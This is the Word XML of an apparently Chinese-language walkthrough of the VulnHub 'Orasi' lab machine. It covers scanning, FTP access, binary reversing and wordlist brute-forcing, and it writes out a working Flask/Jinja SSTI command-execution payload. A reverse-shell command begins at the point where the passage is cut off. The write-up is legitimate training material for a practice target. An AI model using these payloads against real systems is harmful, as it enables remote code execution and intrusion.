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3E25E" w14:textId="12FD4634" w:rsidR="009334A2" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F22EF8">
        <w:t>Orasi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31D898E8" w14:textId="5D8BE726" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00A85C14">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://download.vulnhub.com/orasi/Orasi.ova</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DADC328" w14:textId="77777777" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DF9B1D" w14:textId="77777777" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4AA29E" w14:textId="71EEC2F7" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33A5F4" w14:textId="4E60F0C4" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F22EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7801776D" wp14:editId="6B4F83D6">
            <wp:extent cx="5128704" cy="3375953"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2049507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73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B860" w14:textId="2ECFB82E" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标1</w:t>
      </w:r>
      <w:r>
        <w:t>57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402456EB" w14:textId="0B33E5E5" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFC884" w14:textId="30693017" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F22EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E66A5B7" wp14:editId="02AFAED3">
            <wp:extent cx="5274310" cy="2317750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="414008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08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ACC" w14:textId="0321FEE1" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4CFC35" w14:textId="5B8ABD67" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F22EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7491043D" wp14:editId="48BC40CB">
            <wp:extent cx="5274310" cy="2310130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1742538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8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74B4" w14:textId="7890C13E" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F22EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64526F84" wp14:editId="283AA221">
            <wp:extent cx="5274310" cy="2611755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1289824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4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9B89" w14:textId="567C5D9A" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F22EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1FB462" wp14:editId="56D54FC5">
            <wp:extent cx="5274310" cy="4983480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="267675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75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9C61" w14:textId="230397B2" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和5</w:t>
      </w:r>
      <w:r>
        <w:t>000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E99DB6" w14:textId="71A0A116" w:rsidR="00F22EF8" w:rsidRDefault="00F22EF8" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F22EF8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A50C380" wp14:editId="38080EAE">
            <wp:extent cx="5274310" cy="3011805"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="887737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37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854C" w14:textId="6E7D6B5D" w:rsidR="00F22EF8" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C5844">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C8CC013" wp14:editId="45A9ABD2">
            <wp:extent cx="5274310" cy="1330325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="2094364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4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7038" w14:textId="1CC49F4D" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到有网站先去简单爆破一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718F35F7" w14:textId="78A4248F" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C5844">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C1B6D8C" wp14:editId="35BFE711">
            <wp:extent cx="5274310" cy="4180840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1038255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55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0393" w14:textId="2EA990FC" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啥都没有目前只能去看看ftp（有匿名登入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C2FAB0" w14:textId="314AF001" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C5844">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22E61F7F" wp14:editId="7610B99A">
            <wp:extent cx="5274310" cy="2331085"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1715038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38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401" w14:textId="0111BB42" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到文件就直接下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66013B5C" w14:textId="27B08DBA" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C5844">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B39E406" wp14:editId="2C29EE93">
            <wp:extent cx="5274310" cy="711835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="414506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06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DD8" w14:textId="3CA14A57" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C5844">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12ADD149" wp14:editId="79284B11">
            <wp:extent cx="5274310" cy="3112770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="755613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13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88C9" w14:textId="15AD0E26" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952E449" w14:textId="58AF534C" w:rsidR="009C5844" w:rsidRDefault="009C5844" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先跑一下看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD516D9" w14:textId="467F6F25" w:rsidR="009C5844" w:rsidRDefault="008C6E0B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C6E0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77922387" wp14:editId="3C69EB94">
            <wp:extent cx="4968671" cy="4915326"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1149454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4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33F9" w14:textId="27D60A5F" w:rsidR="008C6E0B" w:rsidRDefault="008C6E0B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C6E0B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5958A46B" wp14:editId="090F3E06">
            <wp:extent cx="5274310" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1202362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62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FF4" w14:textId="69982AB9" w:rsidR="008C6E0B" w:rsidRDefault="008C6E0B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感觉要逆向了，上</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ida</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F2DD005" w14:textId="20326EA0" w:rsidR="008C6E0B" w:rsidRDefault="005F26BF" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F26BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49CABD13" wp14:editId="6474F5E2">
            <wp:extent cx="5274310" cy="6766560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="213474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48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533B" w14:textId="46EAE84A" w:rsidR="005F26BF" w:rsidRDefault="005F26BF" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ov</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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>看到一下字符串/</w:t>
      </w:r>
      <w:r>
        <w:t>sh4d0w$s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E18D5" w14:textId="5CE6115B" w:rsidR="005F26BF" w:rsidRDefault="005F26BF" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个有点像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加上去看看（有两个端口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAF86F" w14:textId="0D671C8E" w:rsidR="005F26BF" w:rsidRDefault="005F26BF" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F26BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47BF1C92" wp14:editId="6624DB19">
            <wp:extent cx="5274310" cy="1501140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="45606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65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32F" w14:textId="5930A668" w:rsidR="005F26BF" w:rsidRDefault="005F26BF" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好的访问进去了，接下来需要爆破参数了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7F39BD" w14:textId="762BFEAD" w:rsidR="005F26BF" w:rsidRDefault="00B8456F" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8456F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D62E7C" wp14:editId="20238636">
            <wp:extent cx="5274310" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="462061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61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0E7" w14:textId="22634AD0" w:rsidR="00B8456F" w:rsidRDefault="00B8456F" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有点尴尬，没出来，但是我想到了index上面一段奇怪的东</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>东</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，应该有用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FFEAB0" w14:textId="596C2376" w:rsidR="00B8456F" w:rsidRDefault="00B8456F" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8456F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="249949E6" wp14:editId="27B4C2D7">
            <wp:extent cx="1691787" cy="510584"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1302328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284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7DB7" w14:textId="42E05219" w:rsidR="00B8456F" w:rsidRDefault="00B8456F" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看着想crunch的命令格式，直接跑一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1893ECA9" w14:textId="2F397BCD" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB34F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B4F4548" wp14:editId="309C6791">
            <wp:extent cx="5274310" cy="3781425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1047697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7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313F" w14:textId="4EC78299" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嘶</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没错，那就这个是字典了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FACCC7" w14:textId="0D1E0875" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB34F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54371B49" wp14:editId="14D114D1">
            <wp:extent cx="5274310" cy="1398905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1930032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20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49B7" w14:textId="34D06EEA" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB34F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3BD65C" wp14:editId="535872A9">
            <wp:extent cx="5274310" cy="2831465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="221757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57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8115" w14:textId="1EC691A3" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k出来了，接下来就是漏洞问题了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D23257" w14:textId="5A39BD50" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB34F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74208C90" wp14:editId="69274289">
            <wp:extent cx="5274310" cy="1007745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="115289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9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C726" w14:textId="1057480E" w:rsidR="00AB34F2" w:rsidRDefault="00AB34F2" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感觉有点像</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入值</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=输出值，前面查出来了服务的版本，先去看看有没有洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB8FAD" w14:textId="5BB481B5" w:rsidR="00AB34F2" w:rsidRDefault="0033095B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0033095B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E0E6C7" wp14:editId="5AF3405D">
            <wp:extent cx="5274310" cy="678815"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="154833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96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EEA8" w14:textId="4BFD868F" w:rsidR="0033095B" w:rsidRDefault="0033095B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mm都有问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB4A614" w14:textId="452EE985" w:rsidR="0033095B" w:rsidRDefault="0033095B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就只剩下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FE9C7" w14:textId="06254098" w:rsidR="0033095B" w:rsidRDefault="00000000" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="0033095B" w:rsidRPr="00A85C14">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/bmjoker/p/13508538.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0033095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（原理）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EBE0C1" w14:textId="4D1B78C8" w:rsidR="0033095B" w:rsidRDefault="0033095B" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0033095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前使用的一些框架，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="0033095B">
        <w:t>python的flask，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033095B">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033095B">
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0033095B">
        <w:t>tp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0033095B">
        <w:t>，java的spring等一般都采用成熟的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0033095B">
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0033095B">
        <w:t>MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327B93D9" w14:textId="2B0C836E" w:rsidR="0033095B" w:rsidRDefault="00176F61" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到的模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308347A2" w14:textId="007FCA6A" w:rsidR="00FE5D4E" w:rsidRPr="0033095B" w:rsidRDefault="00FE5D4E" w:rsidP="00FE5D4E">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>{{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>config._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>_class__.__init__.__globals__[%27os%27].popen(%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE5D4E">
        <w:t>%27).read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79BD6B" w14:textId="4A477DC9" w:rsidR="00176F61" w:rsidRDefault="00FE5D4E" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE5D4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33B16681" wp14:editId="16F8E030">
            <wp:extent cx="5274310" cy="1087755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="212035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519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5F16" w14:textId="4EEFFDEA" w:rsidR="00176F61" w:rsidRDefault="00176F61" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0279C9AA" w14:textId="5563B75F" w:rsidR="00176F61" w:rsidRDefault="00176F61" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就是反弹shell（要编码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758EE44D" w14:textId="316D4AE3" w:rsidR="00176F61" w:rsidRDefault="00176F61" w:rsidP="00176F61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00176F61">
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00176F61">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00176F61">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
